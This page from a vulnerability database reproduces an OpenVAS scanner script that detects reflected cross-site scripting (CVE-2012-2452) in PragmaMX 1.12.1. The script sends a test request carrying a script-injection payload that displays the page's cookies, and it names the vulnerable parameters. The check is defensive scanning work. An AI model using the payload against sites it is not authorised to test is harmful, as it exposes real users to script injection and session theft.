PragmaMX Multiple Cross-Site Scripting Vulnerabilities
🗓️ 25 Mar 2013 00:00:00Reported by Copyright (C) 2013 Greenbone AGType
openvas🔗 plugins.openvas.org👁 49 Views
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| pragmaMx 1.12.1 Cross Site Scripting | 25 May 201200:00 | – | zdt | |
| CVE-2012-2452 | 23 May 201200:00 | – | circl | |
| CVE-2012-2452 | 11 Feb 202019:22 | – | cve | |
| CVE-2012-2452 | 11 Feb 202019:22 | – | cvelist | |
| pragmaMx 1.12.1 - 'modules.php' URI Cross-Site Scripting | 23 May 201200:00 | – | exploitdb | |
| pragmaMx 1.12.1 - '/includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php?img_url' Cross-Site Scripting | 23 May 201200:00 | – | exploitdb | |
| EUVD-2012-2438 | 7 Oct 202500:30 | – | euvd | |
| Multiple XSS in pragmaMx | 2 May 201200:00 | – | htbridge | |
| CVE-2012-2452 | 11 Feb 202020:15 | – | nvd | |
| pragmaMx 1.12.1 Cross Site Scripting | 25 May 201200:00 | – | packetstorm |
10
| Source | Link |
|---|---|
| packetstormsecurity | www.packetstormsecurity.com/files/113035 |
| securityfocus | www.securityfocus.com/bid/53669 |
| htbridge | www.htbridge.com/advisory/HTB23090 |
| pragmamx | www.pragmamx.org/Content-pragmaMx-changelog-item-75.html |
| seclists | www.seclists.org/bugtraq/2012/May/126 |
# SPDX-FileCopyrightText: 2013 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.803345");
script_version("2023-12-13T05:05:23+0000");
script_cve_id("CVE-2012-2452");
script_tag(name:"cvss_base", value:"4.3");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");
script_tag(name:"last_modification", value:"2023-12-13 05:05:23 +0000 (Wed, 13 Dec 2023)");
script_tag(name:"severity_vector", value:"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N");
script_tag(name:"severity_origin", value:"NVD");
script_tag(name:"severity_date", value:"2020-02-12 15:46:00 +0000 (Wed, 12 Feb 2020)");
script_tag(name:"creation_date", value:"2013-03-25 16:37:00 +0530 (Mon, 25 Mar 2013)");
script_name("PragmaMX Multiple Cross-Site Scripting Vulnerabilities");
script_xref(name:"URL", value:"http://seclists.org/bugtraq/2012/May/126");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/53669");
script_xref(name:"URL", value:"https://www.htbridge.com/advisory/HTB23090");
script_xref(name:"URL", value:"http://packetstormsecurity.com/files/113035");
script_xref(name:"URL", value:"http://www.pragmamx.org/Content-pragmaMx-changelog-item-75.html");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2013 Greenbone AG");
script_family("Web application abuses");
script_dependencies("find_service.nasl", "no404.nasl", "webmirror.nasl", "DDI_Directory_Scanner.nasl", "gb_php_http_detect.nasl", "global_settings.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
script_tag(name:"impact", value:"Successful exploitation will allow remote attackers to execute arbitrary HTML
or web script in a user's browser session in context of an affected site.");
script_tag(name:"affected", value:"PragmaMX version 1.12.1 and prior.");
script_tag(name:"insight", value:"Multiple flaws due to improperly sanitized 'name' parameter in modules.php and
'img_url' parameter in img_popup.php before they are being returned to the user.");
script_tag(name:"solution", value:"Upgrade to PragmaMx 1.12.2 or later.");
script_tag(name:"summary", value:"PragmaMX is prone to multiple cross site scripting vulnerabilities.");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"qod_type", value:"remote_analysis");
exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");
include("list_array_func.inc");
port = http_get_port(default:80);
if(!http_can_host_php(port:port))
exit(0);
foreach dir (make_list_unique("/", "/pragmamx", "/cms", http_cgi_dirs(port:port)))
{
if(dir == "/") dir = "";
res = http_get_cache(item:string(dir,"/index.php"), port:port);
if('>pragmaMx' >< res)
{
url = dir +'/includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php?'+
'img_url="><script>alert(document.cookie)</script>';
if(http_vuln_check(port: port, url: url, check_header: TRUE,
pattern: "<script>alert\(document\.cookie\)</script>"))
{
report = http_report_vuln_url(port:port, url:url);
security_message(port:port, data:report);
exit(0);
}
}
}
exit(99);
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Dec 2023 00:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 24.3
CVSS 3.16.1
EPSS0.01699